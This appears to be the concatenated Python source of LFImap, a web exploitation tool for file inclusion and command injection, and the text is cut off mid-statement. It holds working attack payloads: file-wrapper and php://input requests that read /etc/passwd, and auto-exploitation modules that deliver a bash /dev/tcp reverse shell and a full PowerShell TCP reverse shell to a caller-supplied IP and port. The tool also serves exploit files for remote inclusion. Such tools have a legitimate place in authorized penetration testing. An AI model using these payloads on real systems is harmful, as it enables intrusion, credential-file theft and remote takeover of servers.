"""Encodings"""
import base64
import urllib.parse as urlparse

from src.utils.arguments import init_args


def base64_encode(string):
    return base64.b64encode(bytes(string, "utf-8")).decode()


def urlencode(string):
    return urlparse.quote(string, safe="")


def encode(payload):
    args  = init_args()
    if args['encodings']:
        for encoding in args['encodings']:
            if encoding == "B":
                payload = base64_encode(payload)
            elif encoding == "U":
                payload = urlencode(payload)
    return payload



"""HTTP Server"""
import http.client
import http.server
import socketserver
from src.utils.arguments import init_args
from src.configs import config
from src.utils.colors import Colors


class ServerHandler(http.server.SimpleHTTPRequestHandler):
    """HTTP Server Handler"""
    def __init__(self, *args, **kwargs):
        super().__init__(*args, directory=config.webDir, **kwargs)

    def log_message(self, format, *args):
        pass


def serve_forever():
    """Serve Forever"""
    args  = init_args()
    socketserver.TCPServer.allow_reuse_address = True
    try:
        with socketserver.TCPServer(("", config.rfi_test_port), ServerHandler) as httpd:
            if args['verbose']:
                print(
                    Colors().blue("[i]")
                    + " Opening temporary local web server on port "
                    + str(config.rfi_test_port)
                    + " and hosting $LFIMAP_DIR/src/exploits that will be used for test inclusion",
                    flush = True
                )
            try:
                httpd.serve_forever()
            except:
                httpd.server_close()
    except:
        if args['verbose']:
            print(
                Colors().red("[-]")
                + " Cannot setup local web server on port "
                + str(config.rfi_test_port)
                + ", it's in use or unavailable...",
                flush = True
            )



"""File"""
from src.utils.arguments import init_args
from src.httpreqs.request import prepareRequest
from src.httpreqs.request import REQUEST
from src.configs.config import proxies
from src.utils.colors import Colors


def test_file_trunc(url, post):
    """Test file trunc"""
    args  = init_args()
    if args['verbose']:
        print(Colors().blue("[i]") + " Testing with file wrapper...", flush = True)

    tests = []
    tests.append("file%3A%2F%2F%2Fetc%2Fpasswd")
    tests.append("file%3A%2F%2FC%3A%5CWindows%5CSystem32%5Cdrivers%5Cetc%5Chosts")

    tests.append("file%3A%2F%2F%2Fetc%2Fpasswd%2500")
    tests.append("file%3A%2F%2FC%3A%5CWindows%5CSystem32%5Cdrivers%5Cetc%5Chosts%2500")

    for i, test in enumerate(tests):
        u, reqHeaders, postTest = prepareRequest(args['param'], test, url, post)
        _, br = REQUEST(u, reqHeaders, postTest, proxies, "LFI", "FILE")

        if not br:
            return

        if i == 1 and args['quick']:
            return

    return



"""Request"""
import socket
import time
import sys
import urllib.parse as urlparse
from urllib.parse import urlparse, parse_qs

import requests
import requests.exceptions
import urllib3
from bs4 import BeautifulSoup

from src.utils.arguments import init_args
from src.utils.encodings import encode
from src.utils.stats import stats
from src.configs import config
from src.utils.colors import Colors
from src.utils.cleanup import lfimap_cleanup
from src.attacks.pwn import pwn

def extract_all_parameters(url, form_data=""):
    """Extract parameters from the URL"""
    parsed_url = urlparse(url)
    url_parameters = parse_qs(parsed_url.query)

    # Convert the values from a list to a single value (if applicable)
    cleaned_url_parameters = {
        key: value[0] if len(value) == 1 else value
        for key, value in url_parameters.items()
    }

    # Extract parameters from the form data
    if form_data != "":
        form_parameters = parse_qs(form_data)

    # Convert the values from a list to a single value (if applicable)
    cleaned_form_parameters = {
        key: value[0] if len(value) == 1 else value
        for key, value in form_parameters.items()
    }

    # Merge the URL parameters and form parameters into a single dictionary
    all_parameters = {**cleaned_url_parameters, **cleaned_form_parameters}

    return all_parameters


def extract_input_fields(html_content):
    """Extract Input Fields"""
    input_fields = {}

    soup = BeautifulSoup(html_content, "html.parser")
    for input_tag in soup.find_all("input"):
        input_name = input_tag.get("name")
        input_value = input_tag.get("value")

        if input_name is not None:
            input_fields[input_name] = input_value

    return input_fields


def addToExploits(
    req, request_type, exploit_type, getVal, postVal, headers, attackType, os
):
    """Add to Exploits"""
    e = {}
    e["REQUEST_TYPE"] = request_type
    e["EXPLOIT_TYPE"] = exploit_type
    e["GETVAL"] = getVal
    e["POSTVAL"] = postVal
    e["HEADERS"] = req.headers
    e["ATTACK_METHOD"] = attackType
    e["OS"] = os
    config.exploits.append(e)
    return e


def init(
    req, reqType, explType, getVal, postVal, headers, attackType, cmdInjectable=False
):
    """Init the list of exploits"""
    # if(config.scriptName != ""):
    config.TO_REPLACE.append(config.scriptName)
    config.TO_REPLACE.append(config.scriptName + ".php")
    config.TO_REPLACE.append(config.scriptName + "%00")

    args  = init_args()
    
    if checkPayload(req) or cmdInjectable:
        for _, to_replace in enumerate(config.TO_REPLACE):
            if postVal and isinstance(postVal, bytes):
                postVal = postVal.decode("utf-8")

            if (
                getVal.find(to_replace) != -1
                or getVal.find("?c=" + to_replace) != -1
                or postVal.find(to_replace) != -1
            ):
                # Determine the os based on the payload that worked
                # TODO improve this to reduce false positives.
                if (
                    "ipconfig" in getVal.lower()
                    or "Windows IP Configuration" in getVal.lower()
                ):
                    os = "windows"
                else:
                    os = "linux"

                u = getVal.replace(to_replace, config.tempArg)

                if postVal.find(to_replace):
                    p = postVal.replace(to_replace, config.tempArg)
                    # Determine the os based on the payload that worked
                    # TODO improve this to reduce false positives.
                    if (
                        "ipconfig" in postVal.lower()
                        or "Windows IP Configuration" in postVal.lower()
                    ):
                        os = "windows"
                    else:
                        os = "linux"

                else:
                    p = ""

                exploit = addToExploits(
                    req, reqType, explType, u, p, headers, attackType, os
                )

                # Print finding
                if postVal == "" and explType:
                    print(Colors().green("[+]") + " " + explType + " -> '" + getVal + "'", flush = True)
                    stats["vulns"] += 1

                elif explType:
                    print(
                        Colors().green("[+]")
                        + " "
                        + explType
                        + " -> '"
                        + getVal
                        + "' -> HTTP POST -> '"
                        + postVal
                        + "'",
                        flush = True
                    )
                    stats["vulns"] += 1

                if args['revshell'] and (explType == "RFI" or explType == "RCE" or attackType == "TRUNC"):
                    pwn(exploit)

                if not args['no_stop']:
                    return True

                return False

    return False


def checkPayload(webResponse):
    """
    Checks if sent payload is executed, if any of the below keywords are in the response, returns True
    """
    for word in config.KEY_WORDS:
        if webResponse:
            if word in webResponse.text:
                if (
                    word == "PD9w"
                    and "PD9waHAgc3lzdGVtKCRfR0VUW2NdKTsgPz4K" in webResponse.text
                ):
                    return False
                return True
    return False


def prepareRequest(parameter, payload, url, postData):
    """
    Prepare a request to be sent
    """

    args  = init_args()

    # Preparing URL
    if parameter in url:
        reqUrl = url.replace(parameter, encode(payload))
    else:
        reqUrl = url

    # Preparing form-line data
    
    # if postData and args['json'] and not is_valid_json(args['json']):
    #    reqData = convert_http_formdata_to_json(postData.replace(parameter, encode(payload)).lstrip())
    
    if postData:
        reqData = postData.replace(parameter, encode(payload)).lstrip()
    elif postData:
        reqData = postData.replace(parameter, encode(payload)).lstrip()
    else:
        reqData = ""

    # Preparing headers
    reqHeaders = {}
    if any(parameter in str(value) for value in args['httpheaders'].values()):
        for key, value in args['httpheaders'].items():
            if parameter in value:
                reqHeaders[key.strip()] = value.replace(
                    parameter, encode(payload)
                ).encode("utf-8")
            else:
                reqHeaders[key] = value

    else:
        return reqUrl, args['httpheaders'], reqData
    return reqUrl, reqHeaders, reqData


def REQUEST(
    url,
    headersData,
    postData,
    proxy,
    exploitType,
    exploitMethod,
    exploit=False,
    followRedirect=False,
    isCsrfRequest=False,
):
    """Send out a request"""
    args  = init_args()
    followRedirect = args['follow_redirect']
    doContinue = True
    res = None
    if not postData:
        postData = ""
    try:
        stats["requests"] += 1
        # Set the timeout on the testing request, based on proxy and user-provided value
        if exploitMethod == "RFI":
            timeout = 15
        elif args['maxTimeout']:
            timeout = args['maxTimeout']
        elif args['proxyAddr']:
            timeout = 15
        else:
            timeout = 5

        # Handle if CSRF request
        if isCsrfRequest:
            if args['csrfMethod'] and isCsrfRequest:
                method = args['csrfMethod']
        elif args['method']:
            method = args['method']
        else:
            method = "GET"

        if args['csrfUrl'] and isCsrfRequest:
            url = args['csrfUrl']

        if args['csrfData'] and isCsrfRequest:
            postData = args['csrfData']

        # Handle CSRF refresh before sending the payload.
        if args['updateCsrfToken']:
            if args['previouscsrf']:
                r = args['previousres']
                input_fields = extract_input_fields(r.text)
                parameters = extract_all_parameters(config.url, config.postreq)
            else:
                # TODO CSRF token request.
                # csrf_r,_ = REQUEST(args['csrfUrl'], headers, args['csrfData'], config.proxies, "test", "test", exploit = False, followRedirect = True, isCsrfRequest = True)
                r = requests.request(
                    method,
                    url,
                    data=postData,
                    headers=headersData,
                    proxies=proxy,
                    verify=False,
                    timeout=timeout,
                    allow_redirects=True,
                )
                input_fields = extract_input_fields(r.text)
                parameters = extract_all_parameters(config.url, config.postreq)

            if input_fields and parameters:
                if args['csrfParameter'] and args['csrfParameter'] in url:
                    # Modify get data.
                    # Get current csrf value from the request that user specified
                    curr_csrf = parameters[args['csrfParameter']]
                    new_csrf = input_fields[args['csrfParameter']]
                    url = url.replace(curr_csrf, new_csrf)

                if isinstance(postData, bytes):
                    postData = postData.decode("utf-8", errors="replace")

                if args['csrfParameter'] and args['csrfParameter'] in postData:
                    curr_csrf = parameters[args['csrfParameter']]
                    new_csrf = input_fields[args['csrfParameter']]
                    postData = postData.replace(curr_csrf, new_csrf)

        else:
            # This res object will be used to check if the payload sent worked and if the parameter is actually vulnerable
            # Send actual payload
            if exploitMethod == "test" or exploitMethod == "RFI":
                res = requests.request(
                    method,
                    url,
                    data=postData,
                    headers=headersData,
                    proxies=proxy,
                    verify=False,
                    timeout=timeout,
                    allow_redirects=followRedirect,
                )
            else:
                res = requests.request(
                    method,
                    url,
                    data=postData,
                    headers=headersData,
                    proxies=proxy,
                    verify=False,
                    allow_redirects=followRedirect,
                    timeout=args['maxTimeout']
                )

            # Check if CSRF token is returned in the response, prepare it for the next request
            if args['updateCsrfToken']:
                input_fields = extract_input_fields(res.text)
                if (
                    args['csrfParameter']
                    and args['csrfParameter'] in input_fields
                    and input_fields[args['csrfParameter']]
                ):
                    args['previouscsrf'] = input_fields[args['csrfParameter']]
                else:
                    args['previouscsrf'] = False

                if res:
                    args['previousres'] = res

            # If the second order check url is specified, res will be overwritten with new value of that second order endpoint.
            # If the request is csrf token refresh, skip the second order check.
            if args['checkUrl'] and not isCsrfRequest:
                if args['secondMethod']:
                    res = requests.request(
                        args['secondMethod'],
                        args['checkUrl'],
                        data=args['secondData'],
                        headers=headersData,
                        proxies=proxy,
                        verify=False,
                        allow_redirects=True,
                        timeout=args['maxTimeout']
                    )
                else:
                    res = requests.get(
                        args['checkUrl'],
                        data=args['secondData'],
                        headers=headersData,
                        proxies=proxy,
                        verify=False,
                        allow_redirects=True,
                        timeout=args['maxTimeout']
                    )

        # TODO exploitMethod and exploitType are not being used
        if not exploit:
            if init(res, "", exploitType, url, postData, headersData, exploitMethod):
                doContinue = False

        if args['log']:
            with open(args['log'], "a+", encoding="utf-8") as fp:

                # Log request
                splitted = url.split("/")
                fp.write(
                    res.request.method
                    + " "
                    + url.replace(
                        "".join(splitted[0] + "/" + splitted[1] + "/" + splitted[2]), ""
                    ).encode('utf-8', errors='ignore').decode('utf-8')
                    + " HTTP/1.1\n"
                )
                fp.write("Host: " + splitted[2] + "\n")
                for k, v in res.request.headers.items():
                    if not (isinstance(k, str)):
                        k = k.decode("utf-8")
                    if not (isinstance(v, str)):
                        v = v.decode("utf-8")
                    fp.write(k + ": " + v + "\n")

                if res.request.body:
                    fp.write("\n" * 2)
                    fp.write(res.request.body)
                fp.write("\n" * 3)

                # Log response
                protocol = "HTTP/1.1"

                fp.write(
                    protocol + " " + str(res.status_code) + " " + res.reason + "\n"
                )
                for k, v in res.headers.items():
                    if not (isinstance(k, str)):
                        k = k.decode("lutf-8")
                    if not (isinstance(v, str)):
                        v = v.decode("utf-8")
                    fp.write(k + ": " + v + "\n")
                fp.write("\n\n")
                fp.write(res.text + "\n")
                fp.write("--\n\n\n")

        if args['delay']:
            time.sleep(args['delay'] / 1000)

    except KeyboardInterrupt:
        print("\nKeyboard interrupt detected. Exiting...", flush = True)
        lfimap_cleanup(config.webDir)
    except FileNotFoundError:
        if(args['log']):
            print(Colors().red("[-]") 
                 + " Specified log directory doesn't exist. Alternatively," +
                "to create a folder specify an absolute path. Exiting...", flush = True)
            sys.exit(-1)
        if(args['log']):
            print(Colors().red("[-]") + 
                " Specified output directory doesn't exist. Alternatively," +
                "to create a folder specify an absolute path. Exiting...", flush = True)
            sys.exit(-1)
    except requests.exceptions.InvalidSchema:
        if not args['no_stop']:
            print(
                Colors().red("[-]")
                + " Previous request caused InvalidSchema exception. Try specifying '--no-stop' to continue testing even if errors occurred...",
                flush = True
            )
        else:
            print(
                Colors().red("[-]")
                + " InvalidSchema exception detected. Server cannot parse the parameter URI. Try proxying requests to see exactly what happened...",
                flush = True
            )
        return False, False
    except requests.exceptions.ConnectionError:
        if not args['no_stop']:
            print(
                Colors().red("[-]")
                + " Previous request caused ConnectionError. Try specifying '--no-stop' to continue testing even if errors occurred...",
                flush = True
            )
        else:
            print(
                Colors().red("[-]")
                + " Previous request caused ConnectionError. Try proxying requests to see exactly what happened...",
                flush = True
            )
        return False, False
    except socket.timeout:
        if exploitMethod == "RFI" and not args['callback'] and not args['lhost']:
            print(
                Colors().green("[?]")
                + " Socket timeout. This could be an indication for RFI vulnerability. Try specifying '--lhost' or '--callback' to confirm...",
                flush = True
            )
        if not args['no_stop']:
            print(
                Colors().red("[-]")
                + " Previous request caused Socket timeout. Try specifying '--no-stop' to continue testing even if errors occurred...",
                flush = True
            )
        else:
            print(
                Colors().red("[-]")
                + " Previous request caused socket timeout. Try specifying bigger '--delay' or '--max-timeout'. Skipping...",
                flush = True
            )
        return False, False
    except requests.exceptions.ReadTimeout:
        if exploitMethod == "RFI" and not args['callback'] and not args['lhost']:
            print(
                Colors().green("[?]")
                + " Previous request caused ReadTimeout exception. This could be an indication for RFI vulnerability. Try specifying '--lhost' or '--callback' to confirm.",
                flush = True
            )
        else:
            print(
                Colors().red("[-]")
                + " Previous request caused read timeout. Try specifying bigger '--delay' or '--max-timeout'. Skipping...",
                flush = True
            )
        return False, False
    except urllib3.exceptions.ReadTimeoutError:
        if exploitMethod == "RFI" and not args['callback'] and not args['lhost']:
            print(
                Colors().green("[?]")
                + " Previous request caused ReadTimeoutError. This could be an indication for RFI vulnerability. Try specifying '--lhost' or '--callback' to confirm.",
                flush = True
            )
        else:
            print(
                Colors().red("[-]")
                + " Previous request caused ReadTimeoutError. Try specifying bigger '--delay' or '--max-timeout'. Skipping...",
                flush = True
            )
        return False, False
    except ConnectionRefusedError:
        if not args['no_stop']:
            print(
                Colors().red("[-]")
                + " Previous request caused ConnectionRefusedError. Try specifying '--no-stop' to continue testing upon errors...",
                flush = True
            )
        else:
            print(
                Colors().red("[-]")
                + " Previous request caused ConnectionRefusedError. Try proxying requests to see exactly what happened...",
                flush = True
            )
        return False, False
    except:
        if args['verbose']:
            print(
                Colors().red("[-]")
                + " Previous request caused uncaught exception. Try proxying requests to see exactly what happened",
                flush = True
            )
            raise
        return False, False

    return res, doContinue



"""colors"""
import os

from src.utils.arguments import init_args

class Colors():
    def __init__(self) -> None:
        self.args = init_args()

    def green(self, text):
        """green"""
        if self.args["no_colors"]:
            return text

        if os.name == "nt":
            os.system("")

        GREEN = "\033[92m"
        RESET = "\033[0m"
        return GREEN + text + RESET


    def red(self, text):
        """red"""
        if self.args["no_colors"]:
            return text

        if os.name == "nt":
            os.system("")

        RED = "\033[91m"
        RESET = "\033[0m"

        return RED + text + RESET


    def blue(self, text):
        """blue"""
        if self.args["no_colors"]:
            return text

        if os.name == "nt":
            os.system("")

        BLUE = "\033[94m"
        RESET = "\033[0m"

        return BLUE + text + RESET


    def yellow(self, text):
        """yellow"""
        if self.args["no_colors"]:
            return text

        if os.name == "nt":
            os.system("")

        YELLOW = "\033[93m"
        RESET = "\033[0m"

        return YELLOW + text + RESET


    def purple(self, text):
        """purple"""
        if self.args["no_colors"]:
            return text

        ORANGE = "\033[95m"
        RESET = "\033[0m"

        return ORANGE + text + RESET


    def lightblue(self, text):
        """lightblue"""
        if self.args["no_colors"]:
            return text

        if os.name == "nt":
            os.system("")

        LIGHTBLUE = "\033[1;36m"
        RESET = "\033[0m"

        return LIGHTBLUE + text + RESET



"""Bash"""
from src.httpreqs import request
from src.configs import config
from src.utils.encodings import encode
from src.utils.arguments import init_args
from src.attacks.logPoison import exploit_log_poison
from src.utils.info import printInfo
from src.utils.colors import Colors


def exploit_bash(exploit, method, ip, port):
    """Exploit Bash"""
    args  = init_args()
    url = exploit["GETVAL"]
    post = exploit["POSTVAL"]

    print(
        Colors().purple("[?]") + " Checking if bash is available on the target system...", flush = True
    )

    if method == "INPUT" and config.tempArg not in url:
        bashTest = "which bash"
        bashPayloadStageOne = (
            f"echo 'bash -i >& /dev/tcp/{ip}/{port}+0>&1'>/tmp/1.sh"
        )
        bashPayloadStageTwo = "bash /tmp/1.sh"

    else:
        bashTest = "which%20bash"
        bashPayloadStageOne = (
            f"echo+'bash+-i+>%26+/dev/tcp/{ip}/{port}+0>%261'>/tmp/1.sh"
        )
        bashPayloadStageTwo = "bash+/tmp/1.sh"

    if method == "INPUT":
        if args['postreq']:
            res, _ = request.REQUEST(
                url,
                args['httpheaders'],
                post.replace(config.tempArg, encode(bashTest)),
                config.proxies,
                "",
                "",
                exploit=True,
            )
        else:
            res, _ = request.REQUEST(
                url.replace(config.tempArg, encode(bashTest)),
                args['httpheaders'],
                post,
                config.proxies,
                "",
                "",
                exploit=True,
            )

        if "/bash" in res.text:
            printInfo(ip, port, "bash", "input wrapper")
            if args['postreq']:
                request.REQUEST(
                    url,
                    args['httpheaders'],
                    post.replace(config.tempArg, encode(bashPayloadStageOne)),
                    config.proxies,
                    "",
                    "",
                    exploit=True,
                )
                request.REQUEST(
                    url,
                    args['httpheaders'],
                    post.replace(config.tempArg, encode(bashPayloadStageTwo)),
                    config.proxies,
                    "",
                    "",
                    exploit=True,
                )
            else:
                request.REQUEST(
                    url.replace(config.tempArg, encode(bashPayloadStageOne)),
                    args['httpheaders'],
                    post,
                    config.proxies,
                    "",
                    "",
                )
                request.REQUEST(
                    url.replace(config.tempArg, encode(bashPayloadStageTwo)),
                    args['httpheaders'],
                    post,
                    config.proxies,
                    "",
                    "",
                    exploit=True,
                )

    if method == "DATA":
        if args['postreq']:
            res, _ = request.REQUEST(
                url.replace(config.tempArg, encode(bashTest)),
                args['httpheaders'],
                post,
                config.proxies,
                "",
                "",
                exploit=True,
            )
        else:
            res, _ = request.REQUEST(
                url.replace(config.tempArg, encode(bashTest)),
                args['httpheaders'],
                "",
                config.proxies,
                "",
                "",
                exploit=True,
            )
        if "/bash" in res.text:
            printInfo(ip, port, "bash", "data wrapper")
            if args['postreq']:
                request.REQUEST(
                    url.replace(config.tempArg, encode(bashPayloadStageOne)),
                    args['httpheaders'],
                    post,
                    config.proxies,
                    "",
                    "",
                    exploit=True,
                )
                request.REQUEST(
                    url.replace(config.tempArg, encode(bashPayloadStageTwo)),
                    args['httpheaders'],
                    post,
                    config.proxies,
                    "",
                    "",
                    exploit=True,
                )
            else:
                request.REQUEST(
                    url.replace(config.tempArg, encode(bashPayloadStageOne)),
                    args['httpheaders'],
                    "",
                    config.proxies,
                    "",
                    "",
                    exploit=True,
                )
                request.REQUEST(
                    url.replace(config.tempArg, encode(bashPayloadStageTwo)),
                    args['httpheaders'],
                    "",
                    config.proxies,
                    "",
                    "",
                    exploit=True,
                )

    if method == "EXPECT":
        if args['postreq']:
            res, _ = request.REQUEST(
                url,
                args['httpheaders'],
                post.replace(config.tempArg, encode(bashTest)),
                config.proxies,
                "",
                "",
                exploit=True,
            )
        else:
            res, _ = request.REQUEST(
                url.replace(config.tempArg, encode(bashTest)),
                args['httpheaders'],
                "",
                config.proxies,
                "",
                "",
                exploit=True,
            )
        if "/bash" in res.text:
            printInfo(ip, port, "bash", "expect wrapper")
            if args['postreq']:
                request.REQUEST(
                    url,
                    args['httpheaders'],
                    post.replace(config.tempArg, encode(bashPayloadStageOne)),
                    config.proxies,
                    "",
                    "",
                    exploit=True,
                )
                request.REQUEST(
                    url,
                    args['httpheaders'],
                    post.replace(config.tempArg, encode(bashPayloadStageTwo)),
                    config.proxies,
                    "",
                    "",
                    exploit=True,
                )
            else:
                request.REQUEST(
                    url.replace(config.tempArg, encode(bashPayloadStageOne)),
                    args['httpheaders'],
                    "",
                    config.proxies,
                    "",
                    "",
                    exploit=True,
                )
                request.REQUEST(
                    url.replace(config.tempArg, encode(bashPayloadStageTwo)),
                    args['httpheaders'],
                    "",
                    config.proxies,
                    "",
                    "",
                    exploit=True,
                )

    if method == "TRUNC":
        exploit_log_poison(
            ip,
            port,
            url,
            encode(bashPayloadStageOne),
            encode(bashPayloadStageTwo),
            bashTest,
            "/bash",
            exploit["POSTVAL"],
        )

    if method == "CMD":
        if args['postreq']:
            res, _ = request.REQUEST(
                url,
                args['httpheaders'],
                post.replace(config.tempArg, encode(bashTest)),
                config.proxies,
                "",
                "",
                exploit=True,
            )
        else:
            res, _ = request.REQUEST(
                url.replace(config.tempArg, encode(bashTest)),
                args['httpheaders'],
                "",
                config.proxies,
                "",
                "",
                exploit=True,
            )
        if "/bin" in res.text and "/bash" in res.text:
            printInfo(ip, port, "bash", "command injection")
            if args['postreq']:
                request.REQUEST(
                    url,
                    args['httpheaders'],
                    post.replace(config.tempArg, encode(bashPayloadStageOne)),
                    config.proxies,
                    "",
                    "",
                    exploit=True,
                )
                request.REQUEST(
                    url,
                    args['httpheaders'],
                    post.replace(config.tempArg, encode(bashPayloadStageTwo)),
                    config.proxies,
                    "",
                    "",
                    exploit=True,
                )
            else:
                request.REQUEST(
                    url.replace(config.tempArg, encode(bashPayloadStageOne)),
                    args['httpheaders'],
                    "",
                    config.proxies,
                    "",
                    "",
                    exploit=True,
                )
                request.REQUEST(
                    url.replace(config.tempArg, encode(bashPayloadStageTwo)),
                    args['httpheaders'],
                    "",
                    config.proxies,
                    "",
                    "",
                    exploit=True,
                )



"""Powershell"""
from src.httpreqs import request
from src.utils.info import printInfo
from src.utils.arguments import init_args
from src.attacks.logPoison import exploit_log_poison
from src.configs import config
from src.utils.encodings import encode


def exploit_powershell(exploit, method, ip, port):
    """Exploit Powershell"""
    args  = init_args()
    url = exploit["GETVAL"]
    post = exploit["POSTVAL"]

    powershellTest = "powershell.exe%20ipconfig"
    powershellPayload = (
        f"powershell+-nop+-c+\"$client+%3d+New-Object+System.Net.Sockets.TCPClient('{ip}',{port})%3b$stream+%3d+$client."
        "GetStream()%3b[byte[]]$bytes+%3d+0..65535|%25{0}%3bwhile(($i+%3d+$stream.Read($bytes,+0,+$bytes.Length))+-ne+0){%3b$data"
        "+%3d+(New-Object+-TypeName+System.Text.ASCIIEncoding).GetString($bytes,0,+$i)%3b$sendback+%3d+(iex+$data+2>%261+|+Out-String+)%3b$"
        "sendback2+%3d+$sendback+%2b+'PS+'+%2b+(pwd).Path+%2b+'>+'%3b$sendbyte+%3d+([text.encoding]%3a%3aASCII).GetBytes($sendback2)%3b$stream"
        '.Write($sendbyte,0,$sendbyte.Length)%3b$stream.Flush()}%3b$client.Close()" '
    )

    if method == "INPUT":
        res, _ = request.REQUEST(
            url.replace(config.tempArg, encode(powershellTest)),
            args['httpheaders'],
            post,
            config.proxies,
            "",
            "",
            exploit=True,
        )

        if "Windows IP Configuration" in res.text:
            u = url.replace(config.tempArg, encode(powershellPayload))
            request.REQUEST(
                u,
                args['httpheaders'],
                exploit["POSTVAL"],
                config.proxies,
                "",
                "",
                exploit=True,
            )
            printInfo(ip, port, "powershell", "input wrapper")
            return True

    if method == "DATA":
        if args['postreq']:
            res, _ = request.REQUEST(
                url.replace(config.tempArg, encode(powershellTest)),
                args['httpheaders'],
                post,
                config.proxies,
                "",
                "",
                exploit=True,
            )
        else:
            res, _ = request.REQUEST(
                url.replace(config.tempArg, encode(powershellTest)),
                args['httpheaders'],
                "",
                config.proxies,
                "",
                "",
                exploit=True,
            )

        if "Windows IP Configuration" in res.text:
            printInfo(ip, port, "powershell", "data wrapper")
            u = url.replace(config.tempArg, encode(powershellPayload))
            if args['postreq']:
                request.REQUEST(
                    url.replace(config.tempArg, encode(powershellTest)),
                    args['httpheaders'],
                    post,
                    config.proxies,
                    "",
                    "",
                    exploit=True,
                )
            else:
                request.REQUEST(
                    u, args['httpheaders'], "", config.proxies, "", "", exploit=True
                )
            return True

    if method == "EXPECT":
        if args['postreq']:
            res, _ = request.REQUEST(
                url,
                args['httpheaders'],
                post.replace(config.tempArg, encode(powershellTest)),
                config.proxies,
                "",
                "",
                exploit=True,
            )
        else:
            res, _ = request.REQUEST(
                url.replace(config.tempArg, encode(powershellTest)),
                args['httpheaders'],
                "",
                config.proxies,
                "",
                "",
                exploit=True,
            )

        if "Windows IP Configuration" in res.text:
            u = url.replace(config.tempArg, encode(powershellPayload))
            printInfo(ip, port, "powershell", "expect wrapper")
            if args['postreq']:
                request.REQUEST(
                    url,
                    args['httpheaders'],
                    post.replace(config.tempArg, encode(powershellTest)),
                    config.proxies,
                    "",
                    "",
                    exploit=True,
                )
            else:
                request.REQUEST(
                    u, args['httpheaders'], "", config.proxies, "", "", exploit=True
                )
            return True

    if method == "TRUNC":
        exploit_log_poison(
            ip,
            port,
            url,
            encode(powershellPayload),
            "",
            encode(powershellTest),
            "Windows IP Configuration",
            exploit["POSTVAL"],
        )
        return True

    if method == "CMD":
        if args['postreq']:
            res, _ = request.REQUEST(
                url,
                args['httpheaders'],
                post.replace(config.tempArg, encode(powershellTest)),
                config.proxies,
                "",
                "",
                exploit=True,
            )
        else:
            res, _ = request.REQUEST(
                url.replace(config.tempArg, encode(powershellTest)),
                args['httpheaders'],
                "",
                config.proxies,
                "",
                "",
                exploit=True,
            )

        if "Windows IP Configuration" in res.text:
            printInfo(ip, port, "powershell", "command injection")
            if args['postreq']:
                request.REQUEST(
                    url,
                    args['httpheaders'],
                    post.replace(config.tempArg, encode(powershellPayload)),
                    config.proxies,
                    "",
                    "",
                    exploit=True,
                )
            else:
                request.REQUEST(
                    url.replace(config.tempArg, encode(powershellPayload)),
                    args['httpheaders'],
                    "",
                    config.proxies,
                    "",
                    "",
                    exploit=True,
                )
            return True



"""GET"""
import time
import requests
from src.utils.arguments import init_args


def GET(url, headers, proxy, exploitType, exploitMethod, exploit=False):
    args  = init_args()
    doContinue = True
    res = None

    try:
        if exploit:
            stats["getRequests"] += 1
            if args['method']:
                res = requests.request(
                    args['method'],
                    url,
                    data="",
                    headers=headers,
                    proxies=proxy,
                    verify=False,
                    timeout=args['maxTimeout']
                )
            else:
                res = requests.get(
                    url, headers=headers, data="", proxies=proxy, verify=False,
                    timeout=args['maxTimeout']
                )
        else:
            stats["getRequests"] += 1
            if args['method']:
                res = requests.request(
                    args['method'],
                    url,
                    data="",
                    headers=headers,
                    proxies=proxy,
                    verify=False,
                    timeout=args['maxTimeout']
                )
            else:
                res = requests.get(
                    url, headers=headers, data="", proxies=proxy, verify=False,
                    timeout=args['maxTimeout']
                )
            if init(res, "GET", exploitType, url, "", headers, exploitMethod):
                doContinue = False
        if args['delay']:
            time.sleep(args['delay'] / 1000)
    except KeyboardInterrupt:
        print("\nKeyboard interrupt detected. Exiting...", flush = True)
        lfimap_cleanup()
    except requests.exceptions.InvalidSchema:
        if args['verbose']:
            print(
                "InvalidSchema exception detected. Server doesn't understand the parameter value.",
                flush = True
            )
    except:
        pass

    return res, doContinue



"""Stats"""
stats = {}

# Function that will calculate statistics and print out the numbers

def init_stats():
    """Initialize the stats values"""

    stats["getRequests"] = 0
    stats["postRequests"] = 0
    stats["requests"] = 0
    stats["info"] = 0
    stats["vulns"] = 0
    stats["urls"] = 0

def print_stats():
    """Print stats"""
    print("\n" + "-" * 40 + "\nLFImap finished with execution.", flush = True)
    print("Parameters tested: " + str(stats["urls"]), flush = True)

    totalRequests = stats["requests"] + stats["getRequests"] + stats["postRequests"]
    print("Requests sent: " + str(totalRequests), flush = True)
    print("Vulnerabilities found: " + str(stats["vulns"]), flush = True)


init_stats()




"""cleanup"""
import os

from src.utils.stats import print_stats


# Cleans up all temporary files created during testing
def lfimap_cleanup(webDir):
    """lfimap_cleanup"""
    if os.path.exists(f"{webDir}{os.path.sep}reverse_shell_lin_tmp.php"):
        os.remove(f"{webDir}{os.path.sep}reverse_shell_lin_tmp.php")
    if os.path.exists(f"{webDir}{os.path.sep}reverse_shell_win_tmp.php"):
        os.remove(f"{webDir}{os.path.sep}reverse_shell_win_tmp.php")

    # Print stats info
    print_stats()

    # Exit
    os._exit(0)



"""ICMP Server"""
import threading
import socket
from src.utils.colors import Colors
from src.utils.arguments import init_args


class ICMPThread(threading.Thread):
    """ICMP Thread"""
    def __init__(self):
        threading.Thread.__init__(self)
        self.result = None

    def run(self):
        args  = init_args()
        try:
            s = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_ICMP)
            s.setsockopt(socket.SOL_IP, socket.IP_HDRINCL, 1)
            self.result = False

            while True:
                data, _ = s.recvfrom(1024)
                if data:
                    self.result = True
        except PermissionError:
            if args['verbose']:
                print(
                    Colors().red("[-]")
                    + " Raw socket access is not allowed. For blind ICMP command injection test, rerun lfimap as admin/sudo with '-c'",
                    flush = True
                )

    def getResult(self):
        """getResult"""
        return self.result

    def setResult(self, boolean):
        """setResult"""
        self.result = boolean



"""Input"""
from src.utils.arguments import init_args
from src.configs.config import proxies
from src.httpreqs.request import prepareRequest
from src.httpreqs.request import REQUEST
from src.utils.colors import Colors


def test_input(url, post):
    """Test Input"""
    args  = init_args()
    if args['verbose']:
        print(Colors().blue("[i]") + " Testing with input wrapper...", flush = True)

    tests = []
    posts = []

    if args['is_tested_param_post']:
        posts.append(
            "<?php echo(shell_exec('cat /etc/passwd'));?>/*&"
            + post.replace(args['param'], "php://input")
        )
        posts.append(
            "<?php echo(exec('cat /etc/passwd');?>/*&"
            + post.replace(args['param'], "php://input")
        )
        posts.append(
            "<?php echo(passthru('cat /etc/passwd'));?>/*&"
